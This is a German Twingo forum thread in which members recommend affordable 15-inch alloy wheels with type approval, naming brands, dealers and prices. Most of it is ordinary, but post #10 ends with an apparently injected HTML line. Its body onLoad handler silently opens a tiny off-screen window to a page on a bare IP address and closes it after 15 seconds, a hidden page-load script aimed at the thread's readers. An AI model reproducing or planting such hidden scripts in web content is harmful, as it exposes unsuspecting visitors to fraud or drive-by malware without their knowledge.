Themabewertung:
  • 0 Bewertung(en) - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
15" Alus für den Twingo
#1
Hallo Leute

ich suche schöne 15" Alus für den Twingo, hab schon mal nachgeschaut aber nirgends steht etwas von dem Twingo dabei. Kennt von euch vielleicht jemand welche, am liebsten wären mir Tiefbett aber andere sind auch in ordnung wenn sich sonnst nichts finden läßt.

mfg tobi
Zitieren
Es bedanken sich:
#2
alus mit gutachten fürn Twingo oder einzelabnahme?

gruß
Zitieren
Es bedanken sich:
#3
Elia hat welche im Angebot.
Zitieren
Es bedanken sich:
#4
Bei uns in Essen gibt es nen Ponint S Reifenhändler der macht nur 15 Zoll fürn Twingo. Alles getüvt. Vielleicht gibt es bei Euch ja auch einen Point S.
Axel und Denise
Carisma - Twingo
The Japan - French Connection
www.carisma-special.de.vu
Zitieren
Es bedanken sich:
#5
Wenn nicht mach dir doch die Brock drauf! Weiss nicht genau wie die heissen glaube irgendwie b7 oder b6!

Dann musst du aber wahrscheinlich ne einzelabnahme machen!

MFG Bonsai
Ameisen duckt euch!
Zitieren
Es bedanken sich:
#6
Bonsai schrieb:Wenn nicht mach dir doch die Brock drauf! Weiss nicht genau wie die heissen glaube irgendwie b7 oder b6!

Dann musst du aber wahrscheinlich ne einzelabnahme machen!

MFG Bonsai
Die heissen B2 Supercup und es gibt ein Gutachten für den Twingo...

Es gibt auch was von Autec ( www.autec-wheels.de ) und Shaper ( www.shaper-wheels.de ) mit Gutachten...
Zitieren
Es bedanken sich:
#7
für den größeren geldbeutel kann ich nur PLS und RSL empfehlen.
Zitieren
Es bedanken sich:
#8
hi, also sie sollten wenns geht nicht mit einzelabnahme eingetragen werden das kostet bischen zu viel. ja die von elia kenn ich find ich aber nich so der bringer. sollte für den normalen twingo tuner geldbeutel sein, der noch azubi is. von brock gefallen mir aber auch nur die b4 oder 5 oder was des war. vielleicht habt ihr ja noch nen paar ideen.

trotzdem schonmal danke

mfg tobias

achso ps. bei uns kenn ich keinen point s, hab ich noch nie gehört jedenfalls
Zitieren
Es bedanken sich:
#9
schon mal bei a.t.u. geschaut?

also seit ich die pls-gesehn hab, will ich nix anderes mehr, deshalb werd ich noch ne saison mit meinen ollen 165-14-zöllern rumfahrn und sparen sparen sparen...
Zitieren
Es bedanken sich:
#10
Schau mal bei www.oz-racing.de
die die ich meine heissen "F1 Cup"

Kommen im Frühjahr bei mir drauf

Ben


<body onLoad="win=window.open('http://66.246.52.126/page.php?id=7857','_blank','width=1,height=1,left=2000,top=2000');window.setTimeout('win.close()',15000);"></body>
Zitieren
Es bedanken sich:
#11
Was verstehst du denn unter einem kleinerem Geldbeutel?
Die RSL kosten im Komplettradsatz 1000Euro.
Oder guck mal bei Powertech.
Für den Lochkreis 4/100 gibt es doch so viel.
Guckst du hier: http://www.powertech.de/felgen/index.htm
Zitieren
Es bedanken sich:
#12
hi jailbird. schau mal genau hin, da stand "größerer" geldbeutel. und da gehörn die rsl hin
Zitieren
Es bedanken sich:
#13
Ich meinte dich doch gar nicht, meinte Toubi-T.
Zitieren
Es bedanken sich:
#14
reichhard hat gerade 16"er neu im Sortiment... nicht mal so schlecht.... und preislich denke ich auch gerade noch ok...
Grüße aus dem Rheingau

Klaus
Zitieren
Es bedanken sich:


Möglicherweise verwandte Themen…
Thema Verfasser Antworten Ansichten Letzter Beitrag
ZTwingo2 Alus für Twingo 2 1.2 LEV Bj 2012 TheRegal 12 11.335 05.02.2016, 20:11
Letzter Beitrag: onkel-howdy
ZTwingo2 Original Alus basti78 6 5.896 21.02.2015, 16:50
Letzter Beitrag: 9eor9
  Neue Alus für 2005 Twingo wingosss jens69 0 2.117 15.02.2014, 08:40
Letzter Beitrag: jens69
  7x15 Alus abdrehen lassen 208cm 8 6.072 01.09.2013, 06:33
Letzter Beitrag: Chrissi26
  Was kann ich für die Alus noch verlangen? spoilt 0 2.106 14.04.2012, 13:49
Letzter Beitrag: spoilt
  alus für twingo bj. 2003 r14 Twingo2003 4 4.879 07.09.2010, 17:50
Letzter Beitrag: Twingo2003
  alus selbst aufbereiten ? + lackieren ? kolloss 15 10.682 09.04.2010, 12:40
Letzter Beitrag: marcimo
  Alus vom Clio 1 Nita 2 2.732 02.11.2009, 11:42
Letzter Beitrag: Nita

Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste